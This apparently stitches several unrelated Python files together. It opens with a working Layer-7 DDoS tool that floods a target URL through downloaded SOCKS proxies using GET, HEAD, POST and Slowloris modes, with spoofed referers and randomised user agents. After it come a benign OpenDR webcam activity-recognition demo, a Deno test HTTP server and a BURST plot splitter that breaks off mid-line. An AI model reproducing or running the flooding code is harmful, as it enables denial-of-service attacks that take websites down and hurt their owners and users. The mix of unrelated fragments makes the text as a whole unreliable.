"https://www.facebook.com/", "https://www.youtube.com/", "https://www.fbi.com/", "https://www.bing.com/search?q=", "https://r.search.yahoo.com/", "https://www.cia.gov/index.html", "https://vk.com/profile.php?redirect=", "https://www.usatoday.com/search/results?q=", "https://help.baidu.com/searchResult?keywords=", "https://steamcommunity.com/market/search?q=", "https://www.ted.com/search?q=", "https://play.google.com/store/search?q=", "https://www.qwant.com/search?q=", "https://soda.demo.socrata.com/resource/4tka-6guv.json?$q=", "https://www.google.ad/search?q=", "https://www.google.ae/search?q=", "https://www.google.com.af/search?q=", "https://www.google.com.ag/search?q=", "https://www.google.com.ai/search?q=", "https://www.google.al/search?q=", "https://www.google.am/search?q=", "https://www.google.co.ao/search?q=", ] ind_dict = {} data = "" cookies = "" strings = "asdfghjklqwertyuiopZXCVBNMQWERTYUIOPASDFGHJKLzxcvbnm1234567890&" ################################################### Intn = random.randint Choice = random.choice ################################################### def build_threads(mode,thread_num,event,socks_type,ind_rlock): if mode == "post": for _ in range(thread_num): th = threading.Thread(target = post,args=(event,socks_type,ind_rlock,)) th.setDaemon(True) th.start() elif mode == "cc": for _ in range(thread_num): th = threading.Thread(target = cc,args=(event,socks_type,ind_rlock,)) th.setDaemon(True) th.start() elif mode == "head": for _ in range(thread_num): th = threading.Thread(target = head,args=(event,socks_type,ind_rlock,)) th.setDaemon(True) th.start() def getuseragent(): platform = Choice(['Macintosh', 'Windows', 'X11']) if platform == 'Macintosh': os = Choice(['68K', 'PPC', 'Intel Mac OS X']) elif platform == 'Windows': os = Choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win 9x 4.90', 'WindowsCE', 'Windows XP', 'Windows 7', 'Windows 8', 'Windows NT 10.0; Win64; x64']) elif platform == 'X11': os = Choice(['Linux i686', 'Linux x86_64']) browser = Choice(['chrome', 'firefox', 'ie']) if browser == 'chrome': webkit = str(Intn(500, 599)) version = str(Intn(0, 99)) + '.0' + str(Intn(0, 9999)) + '.' + str(Intn(0, 999)) return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit elif browser == 'firefox': currentYear = datetime.date.today().year year = str(Intn(2020, currentYear)) month = Intn(1, 12) if month < 10: month = '0' + str(month) else: month = str(month) day = Intn(1, 30) if day < 10: day = '0' + str(day) else: day = str(day) gecko = year + month + day version = str(Intn(1, 72)) + '.0' return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version elif browser == 'ie': version = str(Intn(1, 99)) + '.0' engine = str(Intn(1, 99)) + '.0' option = Choice([True, False]) if option == True: token = Choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; ' else: token = '' return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')' def randomurl(): return str(Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings) + Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings)) def GenReqHeader(method): header = "" if method == "get" or method == "head": connection = "Connection: Keep-Alive\r\n" if cookies != "": connection += "Cookies: "+str(cookies)+"\r\n" accept = Choice(acceptall) referer = "Referer: "+Choice(referers)+ target + path + "\r\n" useragent = "User-Agent: " + getuseragent() + "\r\n" header = referer + useragent + accept + connection + "\r\n" elif method == "post": post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" content = "Content-Type: application/x-www-form-urlencoded\r\nX-requested-with:XMLHttpRequest\r\n" refer = "Referer: http://"+ target + path + "\r\n" user_agent = "User-Agent: " + getuseragent() + "\r\n" accept = Choice(acceptall) if mode2 != "y":# You can enable customize data data = str(random._urandom(16)) length = "Content-Length: "+str(len(data))+" \r\nConnection: Keep-Alive\r\n" if cookies != "": length += "Cookies: "+str(cookies)+"\r\n" header = post_host + accept + refer + content + user_agent + length + "\n" + data + "\r\n\r\n" return header def ParseUrl(original_url): global target global path global port global protocol original_url = original_url.strip() url = "" path = "/"#default value port = 80 #default value protocol = "http" #http(s)://www.example.com:1337/xxx if original_url[:7] == "http://": url = original_url[7:] elif original_url[:8] == "https://": url = original_url[8:] protocol = "https" #http(s)://www.example.com:1337/xxx ==> www.example.com:1337/xxx #print(url) #for debug tmp = url.split("/") website = tmp[0]#www.example.com:1337/xxx ==> www.example.com:1337 check = website.split(":") if len(check) != 1:#detect the port port = int(check[1]) else: if protocol == "https": port = 443 target = check[0] if len(tmp) > 1: path = url.replace(website,"",1)#get the path www.example.com/xxx ==> /xxx def InputOption(question,options,default): ans = "" while ans == "": ans = str(input(question)).strip().lower() if ans == "": ans = default elif ans not in options: print("> Please enter the correct option") ans = "" continue return ans def CheckerOption(): global proxies N = str(input("> Do you need to get socks list?(y/n,default=y):")) if N == 'y' or N == "" : downloadsocks(choice) else: pass if choice == "4": out_file = str(input("> Socks4 Proxy file path(socks4.txt):")) if out_file == '': out_file = str("socks4.txt") else: out_file = str(out_file) check_list(out_file) proxies = open(out_file).readlines() elif choice == "5": out_file = str(input("> Socks5 Proxy file path(socks5.txt):")) if out_file == '': out_file = str("socks5.txt") else: out_file = str(out_file) check_list(out_file) proxies = open(out_file).readlines() print ("> Number Of Socks%s Proxies: %s" %(choice,len(proxies))) time.sleep(0.03) ans = str(input("> Do u need to check the socks list?(y/n, defualt=y):")) if ans == "": ans = "y" if ans == "y": ms = str(input("> Delay of socks(seconds, default=1):")) if ms == "": ms = int(1) else : try: ms = int(ms) except : ms = float(ms) check_socks(ms) def SetupIndDict(): global ind_dict for proxy in proxies: ind_dict[proxy.strip()] = 0 def OutputToScreen(ind_rlock): global ind_dict i = 0 sp_char = ["|","/","-","\\"] while 1: if i > 3: i = 0 print("{:^70}".format(''' ▄████████ ███ ███ ▄████████ ▄████████ ▄█ ▄█▄ ▄█ ▄████████ ███ █▄ ███▄▄▄▄ ▄████████ ▄█ █▄ ▄████████ ████████▄ ███ ███ ▀█████████▄ ▀█████████▄ ███ ███ ███ ███ ███ ▄███▀ ███ ███ ███ ███ ███ ███▀▀▀██▄ ███ ███ ███ ███ ███ ███ ███ ▀███ ███ ███ ▀███▀▀██ ▀███▀▀██ ███ ███ ███ █▀ ███▐██▀ ███ ███ ███ ███ ███ ███ ███ ███ █▀ ███ ███ ███ █▀ ███ ███ ███ ███ ███ ▀ ███ ▀ ███ ███ ███ ▄█████▀ ███ ███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄▄███▄▄ ▄███▄▄▄ ███ ███ ▀███████████ ███ ███ ▀███████████ ███ ▀▀█████▄ ███ ▀███████████ ███ ███ ███ ███ ███ ▀▀███▀▀▀▀███▀ ▀▀███▀▀▀ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▄ ███▐██▄ ███ ███ ███ ███ ███ ███ ███ ███ █▄ ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▀███▄ ███▌ ▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄███ ███ █▀ ▄████▀ ▄████▀ ███ █▀ ████████▀ ███ ▀█▀ █████▄▄██ ███ █▀ ████████▀ ▀█ █▀ ████████▀ ███ █▀ ██████████ ████████▀ ''' )) print("{:^70}".format(''' _ __ _ ____ ___ ____ | | / /\ \ \_/ | |_ | |_) / / |_|__ /_/--\ |_| |_|__ |_| \ /_/ ''')) #1. xxx.xxx.xxx.xxx:xxxxx ==> DDoS: xxxx ind_rlock.acquire() top10 = sorted(ind_dict, key=ind_dict.get, reverse=True) for num in range(10): top = "none" rps = 0 if len(ind_dict) != 0: top = top10[num] rps = ind_dict[top] ind_dict[top] = 0 print("{:^70}".format("{:2d}. {:^22s} | DDoS: {:d}".format(num+1,top,rps))) total = 0 for k,v in ind_dict.items(): total = total + v ind_dict[k] = 0 ind_rlock.release() print("{:^70}".format(" ["+sp_char[i]+"]L7 attack | Total DDoS:"+str(total))) i+=1 time.sleep(1) print("\n"*100) def cc(event,socks_type,ind_rlock): global ind_dict header = GenReqHeader("get") proxy = Choice(proxies).strip().split(":") add = "?" if "?" in path: add = "&" event.wait() while True: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if brute: s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s,server_hostname=target) try: for _ in range(multiple+1): get_host = "GET " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n" request = get_host + header sent = s.send(str.encode(request)) if not sent: proxy = Choice(proxies).strip().split(":") break s.close() except: s.close() ind_rlock.acquire() ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1 ind_rlock.release() except: s.close() def head(event,socks_type,ind_rlock):#HEAD MODE global ind_dict header = GenReqHeader("head") proxy = Choice(proxies).strip().split(":") add = "?" if "?" in path: add = "&" event.wait() while True: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if brute: s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s,server_hostname=target) try: for _ in range(multiple+1): head_host = "HEAD " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n" request = head_host + header sent = s.send(str.encode(request)) if not sent: proxy = Choice(proxies).strip().split(":") break s.close() except: s.close() ind_rlock.acquire() ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1 ind_rlock.release() except:#dirty fix s.close() def post(event,socks_type,ind_rlock): global ind_dict request = GenReqHeader("post") proxy = Choice(proxies).strip().split(":") event.wait() while True: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if brute: s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(target), int(port))) if str(port) == '443': # //AUTO Enable SSL MODE :) ctx = ssl.SSLContext() s = ctx.wrap_socket(s,server_hostname=target) try: for _ in range(multiple+1): sent = s.send(str.encode(request)) if not sent: proxy = Choice(proxies).strip().split(":") break s.close() except: s.close() ind_rlock.acquire() ind_dict[(proxy[0]+":"+proxy[1]).strip()] += multiple+1 ind_rlock.release() except: s.close() socket_list=[] def slow(conn,socks_type): proxy = Choice(proxies).strip().split(":") for _ in range(conn): try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) s.settimeout(1) s.connect((str(target), int(port))) if str(port) == '443': ctx = ssl.SSLContext() s = ctx.wrap_socket(s,server_hostname=target) s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header s.send("User-Agent: {}\r\n".format(getuseragent()).encode("utf-8")) s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8")) if cookies != "": s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8")) s.send(("Connection:keep-alive").encode("utf-8")) socket_list.append(s) sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r") sys.stdout.flush() except: s.close() proxy = Choice(proxies).strip().split(":")#Only change proxy when error, increase the performance sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r") sys.stdout.flush() while True: for s in list(socket_list): try: s.send("X-a: {}\r\n".format(Intn(1, 5000)).encode("utf-8")) sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r") sys.stdout.flush() except: s.close() socket_list.remove(s) sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r") sys.stdout.flush() proxy = Choice(proxies).strip().split(":") for _ in range(conn - len(socket_list)): try: if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) s.settimeout(1) s.connect((str(target), int(port))) if int(port) == 443: ctx = ssl.SSLContext() s = ctx.wrap_socket(s,server_hostname=target) s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header s.send("User-Agent: {}\r\n".format(getuseragent).encode("utf-8")) s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8")) if cookies != "": s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8")) s.send(("Connection:keep-alive").encode("utf-8")) socket_list.append(s) sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r") sys.stdout.flush() except: proxy = Choice(proxies).strip().split(":") sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r") sys.stdout.flush() pass nums = 0 def checking(lines,socks_type,ms,rlock,): global nums global proxies proxy = lines.strip().split(":") if len(proxy) != 2: rlock.acquire() proxies.remove(lines) rlock.release() return err = 0 while True: if err == 3: rlock.acquire() proxies.remove(lines) rlock.release() break try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) s.settimeout(ms) s.connect((str(target), int(port))) if protocol == "https": ctx = ssl.SSLContext() s = ctx.wrap_socket(s,server_hostname=target) sent = s.send(str.encode("GET / HTTP/1.1\r\n\r\n")) if not sent: err += 1 s.close() break except: err +=1 nums += 1 def check_socks(ms): global nums thread_list=[] rlock = threading.RLock() for lines in list(proxies): if choice == "5": th = threading.Thread(target=checking,args=(lines,5,ms,rlock,)) th.start() if choice == "4": th = threading.Thread(target=checking,args=(lines,4,ms,rlock,)) th.start() thread_list.append(th) time.sleep(0.01) sys.stdout.write("> Checked "+str(nums)+" proxies\r") sys.stdout.flush() for th in list(thread_list): th.join() sys.stdout.write("> Checked "+str(nums)+" proxies\r") sys.stdout.flush() print("\r\n> Checked all proxies, Total Worked:"+str(len(proxies))) ans = input("> Do u want to save them in a file? (y/n, default=y)") if ans == "y" or ans == "": if choice == "4": with open("socks4.txt", 'wb') as fp: for lines in list(proxies): fp.write(bytes(lines,encoding='utf8')) fp.close() print("> They are saved in socks4.txt.") elif choice == "5": with open("socks5.txt", 'wb') as fp: for lines in list(proxies): fp.write(bytes(lines,encoding='utf8')) fp.close() print("> They are saved in socks5.txt.") def check_list(socks_file): print("> Checking list") temp = open(socks_file).readlines() temp_list = [] for i in temp: if i not in temp_list: if ':' in i: temp_list.append(i) rfile = open(socks_file, "wb") for i in list(temp_list): rfile.write(bytes(i,encoding='utf-8')) rfile.close() def downloadsocks(choice): if choice == "4": f = open("socks4.txt",'wb') try: r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&country=all",timeout=5) f.write(r.content) except: pass try: r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks4",timeout=5) f.write(r.content) except: pass try: r = requests.get("https://www.proxyscan.io/download?type=socks4",timeout=5) f.write(r.content) except: pass try: r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks4.txt",timeout=5) f.write(r.content) f.close() except: f.close() try: r = requests.get("https://www.socks-proxy.net/",timeout=5) part = str(r.content) part = part.split("<tbody>") part = part[1].split("</tbody>") part = part[0].split("<tr><td>") proxies = "" for proxy in part: proxy = proxy.split("</td><td>") try: proxies=proxies + proxy[0] + ":" + proxy[1] + "\n" except: pass out_file = open("socks4.txt","a") out_file.write(proxies) out_file.close() except: pass print("> Have already downloaded socks4 list as socks4.txt") if choice == "5": f = open("socks5.txt",'wb') try: r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&country=all",timeout=5) f.write(r.content) except: pass try: r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks5",timeout=5) f.write(r.content) f.close() except: pass try: r = requests.get("https://www.proxyscan.io/download?type=socks5",timeout=5) f.write(r.content) f.close() except: pass try: r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/socks5.txt",timeout=5) f.write(r.content) except: pass try: r = requests.get("https://raw.githubusercontent.com/hookzof/socks5_list/master/proxy.txt",timeout=5) f.write(r.content) f.close() except: f.close() print("> Have already downloaded socks5 list as socks5.txt") def main(): global multiple global choice global data global mode2 global cookies global brute print("> Mode: [cc/post/head/slow/check]") mode = InputOption("> Choose Your Mode (default=cc) :",["cc","post","head","slow","check"],"cc") url = str(input("> Input the target url:")).strip() ParseUrl(url) if mode == "post": mode2 = InputOption("> Customize post data? (y/n, default=n):",["y","n","yes","no"],"n") if mode2 == "y": data = open(input("> Input the file's path:").strip()).readlines() data = ' '.join([str(txt) for txt in data]) choice2 = InputOption("> Customize cookies? (y/n, default=n):",["y","n","yes","no"],"n") if choice2 == "y": cookies = str(input("Plese input the cookies:")).strip() choice = InputOption("> Choose your socks mode(4/5, default=5):",["4","5"],"5") if choice == "4": socks_type = 4 else: socks_type = 5 if mode == "check": CheckerOption() print("> End of process") return if mode == "slow": thread_num = str(input("> Connections(default=400):")) else: thread_num = str(input("> Threads(default=400):")) if thread_num == "": thread_num = int(400) else: try: thread_num = int(thread_num) except: sys.exit("Error thread number") CheckerOption() ind_rlock = threading.RLock() if mode == "slow": input("Press Enter to continue.") th = threading.Thread(target=slow,args=(thread_num,socks_type,)) th.setDaemon(True) th.start() else: multiple = str(input("> Input the Magnification(default=100):")) if multiple == "": multiple = int(100) else: multiple = int(multiple) brute = str(input("> Enable boost mode[beta](y/n, default=n):")) if brute == "": brute = False elif brute == "y": brute = True elif brute == "n": brute = False event = threading.Event() print("> Building threads...") SetupIndDict() build_threads(mode,thread_num,event,socks_type,ind_rlock) event.clear() input("Press Enter to continue.") event.set() threading.Thread(target=OutputToScreen,args=(ind_rlock,),daemon=True).start() while True: try: time.sleep(0.1) except KeyboardInterrupt: break if __name__ == "__main__": main()
demo.py
# Copyright 2020-2022 OpenDR European Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import threading import time from typing import Dict import numpy as np import torch import torchvision import cv2 from imutils import resize from flask import Flask, Response, render_template from imutils.video import VideoStream from pathlib import Path # OpenDR imports from opendr.perception.activity_recognition import X3DLearner from opendr.perception.activity_recognition import CoX3DLearner from opendr.perception.activity_recognition import CLASSES as KINETICS400_CLASSES from opendr.engine.data import Video, Image TEXT_COLOR = (0, 0, 255) # B G R # Initialize the output frame and a lock used to ensure thread-safe # exchanges of the output frames (useful for multiple browsers/tabs # are viewing tthe stream) output_frame = None lock = threading.Lock() # initialize a flask object app = Flask(__name__) @app.route("/") def index(): # return the rendered template return render_template("index.html") def runnig_fps(alpha=0.1): t0 = time.time_ns() fps_avg = 10 def wrapped(): nonlocal t0, alpha, fps_avg t1 = time.time_ns() delta = (t1 - t0) * 1e-9 t0 = t1 fps_avg = alpha * (1 / delta) + (1 - alpha) * fps_avg return fps_avg return wrapped def draw_fps(frame, fps): cv2.putText( frame, f"{fps:.1f} FPS", (10, frame.shape[0] - 10), cv2.FONT_HERSHEY_SIMPLEX, 1.1, TEXT_COLOR, 2, ) def draw_preds(frame, preds: Dict, threshold=0.0): if preds[next(iter(preds))] < threshold: return base_skip = 40 delta_skip = 30 for i, (cls, prob) in enumerate(preds.items()): cv2.putText( frame, f"{prob:04.3f} {cls}", (10, base_skip + i * delta_skip), cv2.FONT_HERSHEY_SIMPLEX, 1.1, TEXT_COLOR, 2, ) def draw_centered_box(frame, border): border = 10 minX = (frame.shape[1] - frame.shape[0]) // 2 + border minY = border maxX = (frame.shape[1] + frame.shape[0]) // 2 - border maxY = frame.shape[0] - border cv2.rectangle(frame, (minX, minY), (maxX, maxY), color=TEXT_COLOR, thickness=1) def center_crop(frame): height, width = frame.shape[0], frame.shape[1] e = min(height, width) x0 = (width - e) // 2 y0 = (height - e) // 2 cropped_frame = frame[y0: y0 + e, x0: x0 + e] return cropped_frame def image_har_preprocessing(image_size: int): standardize = torchvision.transforms.Normalize( mean=(0.45, 0.45, 0.45), std=(0.225, 0.225, 0.225) ) def wrapped(frame): nonlocal standardize frame = resize(frame, height=image_size, width=image_size) frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) frame = torch.tensor(frame).permute((2, 0, 1)) # H, W, C -> C, H, W frame = frame / 255.0 # [0, 255] -> [0.0, 1.0] frame = standardize(frame) return Image(frame, dtype=np.float) return wrapped def video_har_preprocessing(image_size: int, window_size: int): frames = [] standardize = torchvision.transforms.Normalize( mean=(0.45, 0.45, 0.45), std=(0.225, 0.225, 0.225) ) def wrapped(frame): nonlocal frames, standardize frame = resize(frame, height=image_size, width=image_size) frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) frame = torch.tensor(frame).permute((2, 0, 1)) # H, W, C -> C, H, W frame = frame / 255.0 # [0, 255] -> [0.0, 1.0] frame = standardize(frame) if not frames: frames = [frame for _ in range(window_size)] else: frames.pop(0) frames.append(frame) vid = Video(torch.stack(frames, dim=1)) return vid return wrapped def clean_kinetics_preds(preds): k = 3 class_scores, class_inds = torch.topk(preds[0].confidence, k=k) preds = { KINETICS400_CLASSES[int(class_inds[i])]: float(class_scores[i].item()) for i in range(k) } return preds def x3d_activity_recognition(model_name, device): global vs, output_frame, lock # Prep stats fps = runnig_fps() # Init model learner = X3DLearner(device=device, backbone=model_name, num_workers=0) X3DLearner.download(path="model_weights", model_names={model_name}) learner.load(Path("model_weights") / f"x3d_{model_name}.pyth") preprocess = video_har_preprocessing( image_size=learner.model_hparams["image_size"], window_size=learner.model_hparams["frames_per_clip"], ) # Loop over frames from the video stream while True: try: frame = vs.read() frame = center_crop(frame) # Prepocess frame vid = preprocess(frame) # Gererate preds preds = learner.infer(vid) preds = clean_kinetics_preds(preds) frame = cv2.flip(frame, 1) # Flip horizontally for webcam-compatibility draw_preds(frame, preds) draw_fps(frame, fps()) with lock: output_frame = frame.copy() except Exception: pass def cox3d_activity_recognition(model_name, device): global vs, output_frame, lock # Prep stats fps = runnig_fps() # Init model learner = CoX3DLearner(device=device, backbone=model_name, num_workers=0) CoX3DLearner.download(path="model_weights", model_names={model_name}) learner.load(Path("model_weights") / f"x3d_{model_name}.pyth") preprocess = image_har_preprocessing(image_size=learner.model_hparams["image_size"]) # Loop over frames from the video stream while True: try: frame = vs.read() frame = center_crop(frame) # Prepocess frame vid = preprocess(frame) # Gererate preds preds = learner.infer(vid) preds = clean_kinetics_preds(preds) frame = cv2.flip(frame, 1) # Flip horizontally for webcam-compatibility draw_preds(frame, preds) draw_fps(frame, fps()) with lock: output_frame = frame.copy() except Exception: pass def generate(): # grab global references to the output frame and lock variables global output_frame, lock # loop over frames from the output stream while True: # wait until the lock is acquired with lock: # check if the output frame is available, otherwise skip # the iteration of the loop if output_frame is None: continue # encode the frame in JPEG format (flag, encodedImage) = cv2.imencode(".jpg", output_frame) # ensure the frame was successfully encoded if not flag: continue # yield the output frame in the byte format yield ( b"--frame\r\n" b"Content-Type: image/jpeg\r\n\r\n" + bytearray(encodedImage) + b"\r\n" ) @app.route("/video_feed") def video_feed(): # return the response generated along with the specific media # type (mime type) return Response(generate(), mimetype="multipart/x-mixed-replace; boundary=frame") # check to see if this is the main thread of execution if __name__ == "__main__": # construct the argument parser and parse command line arguments ap = argparse.ArgumentParser() ap.add_argument( "-i", "--ip", type=str, required=True, help="IP address of the device" ) ap.add_argument( "-o", "--port", type=int, required=True, help="Ephemeral port number of the server (1024 to 65535)", ) ap.add_argument( "-m", "--model_name", type=str, default="xs", help="Model identifier", ) ap.add_argument( "-d", "--device", type=str, default="cpu", help="Device", ) ap.add_argument( "-v", "--video_source", type=int, default=0, help="ID of the video source to use", ) ap.add_argument( "-a", "--algorithm", type=str, default="x3d", help="Which algortihm to run", choices=["cox3d", "x3d"], ) args = vars(ap.parse_args()) # initialize video stream and allow the camera sensor to warmup # vs = VideoStream(usePiCamera=1).start() vs = VideoStream(src=args["video_source"]).start() time.sleep(2.0) algorithm = { "x3d": x3d_activity_recognition, "cox3d": cox3d_activity_recognition, }[args["algorithm"]] # start a thread that will perform motion detection t = threading.Thread(target=algorithm, args=(args["model_name"], args["device"])) t.daemon = True t.start() # start the flask app app.run( host=args["ip"], port=args["port"], debug=True, threaded=True, use_reloader=False, ) # release the video stream pointer vs.stop()
http_server.py
#!/usr/bin/env python # Copyright 2018 the Deno authors. All rights reserved. MIT license. # Many tests expect there to be an http server on port 4545 servering the deno # root directory. import os import sys from threading import Thread import SimpleHTTPServer import SocketServer from util import root_path from time import sleep PORT = 4545 REDIRECT_PORT = 4546 class ContentTypeHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): if "multipart_form_data.txt" in self.path: self.protocol_version = 'HTTP/1.1' self.send_response(200, 'OK') self.send_header('Content-type', 'multipart/form-data;boundary=boundary') self.end_headers() self.wfile.write( bytes('Preamble\r\n' '--boundary\t \r\n' 'Content-Disposition: form-data; name="field_1"\r\n' '\r\n' 'value_1 \r\n' '\r\n--boundary\r\n' 'Content-Disposition: form-data; name="field_2"; ' 'filename="file.js"\r\n' 'Content-Type: text/javascript\r\n' '\r\n' 'console.log("Hi")' '\r\n--boundary--\r\n' 'Epilogue')) return return SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self) def do_POST(self): # Simple echo server for request reflection if "echo_server" in self.path: self.protocol_version = 'HTTP/1.1' self.send_response(200, 'OK') if self.headers.has_key('content-type'): self.send_header('content-type', self.headers.getheader('content-type')) self.end_headers() data_string = self.rfile.read(int(self.headers['Content-Length'])) self.wfile.write(bytes(data_string)) return self.protocol_version = 'HTTP/1.1' self.send_response(501) self.send_header('content-type', 'text/plain') self.end_headers() self.wfile.write(bytes('Server does not support this operation')) def guess_type(self, path): if ".t1." in path: return "text/typescript" if ".t2." in path: return "video/vnd.dlna.mpeg-tts" if ".t3." in path: return "video/mp2t" if ".t4." in path: return "application/x-typescript" if ".j1." in path: return "text/javascript" if ".j2." in path: return "application/ecmascript" if ".j3." in path: return "text/ecmascript" if ".j4." in path: return "application/x-javascript" if "form_urlencoded" in path: return "application/x-www-form-urlencoded" if "no_ext" in path: return "text/typescript" if "unknown_ext" in path: return "text/typescript" if "mismatch_ext" in path: return "text/javascript" return SimpleHTTPServer.SimpleHTTPRequestHandler.guess_type(self, path) def server(): os.chdir(root_path) # Hopefully the main thread doesn't also chdir. Handler = ContentTypeHandler Handler.extensions_map.update({ ".ts": "application/typescript", ".js": "application/javascript", ".json": "application/json", }) SocketServer.TCPServer.allow_reuse_address = True s = SocketServer.TCPServer(("", PORT), Handler) print "Deno test server http://localhost:%d/" % PORT return s def redirect_server(): os.chdir(root_path) target_host = "http://localhost:%d" % PORT class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): self.send_response(301) self.send_header('Location', target_host + self.path) self.end_headers() Handler = RedirectHandler SocketServer.TCPServer.allow_reuse_address = True s = SocketServer.TCPServer(("", REDIRECT_PORT), Handler) print "redirect server http://localhost:%d/ -> http://localhost:%d/" % ( REDIRECT_PORT, PORT) return s def spawn(): # Main http server s = server() thread = Thread(target=s.serve_forever) thread.daemon = True thread.start() # Redirect server rs = redirect_server() r_thread = Thread(target=rs.serve_forever) r_thread.daemon = True r_thread.start() sleep(1) # TODO I'm too lazy to figure out how to do this properly. return thread def main(): try: thread = spawn() while thread.is_alive(): sleep(10) except KeyboardInterrupt: pass sys.exit(1) if __name__ == '__main__': main()
plotSplitter.py
#!/usr/bin/python3 import os import _thread from util import Semaphore, diskFree, SCOOP_SIZE, NUM_SCOOPS, NONCE_SIZE MAX_READ = 4 * NONCE_SIZE MB = 1024 * 1024 def readerThread(buf, sem, lock): groupCnt = nonces // stagger groupSize = stagger * NONCE_SIZE groupScoopSize = stagger * SCOOP_SIZE try: with open(inPathName, "rb") as I: for scoop in range(NUM_SCOOPS): for group in range(groupCnt): I.seek(group * groupSize + scoop * groupScoopSize) reading = groupScoopSize while reading > 0: if bStop : raise StopIteration("Cancelled by user") buf.append(I.read(reading if reading < MAX_READ else MAX_READ)) if lock.locked(): lock.release() sem.acquire() reading -= MAX_READ except Exception as exc: print(BRIGHTRED + str(exc) + RESET_ALL) buf.append(None) if lock.locked() : lock.release() if __name__ == "__main__": import sys import time from collections import deque from threading import Thread try: from colorama import init, Fore, Style BRIGHTRED = Style.BRIGHT + Fore.RED BRIGHTGREEN = Style.BRIGHT + Fore.GREEN BRIGHTBLUE = Style.BRIGHT + Fore.BLUE BRIGHTYELLOW = Style.BRIGHT + Fore.YELLOW RESET_ALL = Style.RESET_ALL init() except: BRIGHTRED = BRIGHTGREEN = BRIGHTBLUE = BRIGHTYELLOW = RESET_ALL = "" if len(sys.argv) < 2: print(BRIGHTGREEN + "BURST plot splitter (version 1.0)") print(BRIGHTBLUE + "Usage: %s [-r] [-t] [-d] [-s size] [-o OUTDIR] INPATH" % sys.argv[0]) print("-r = 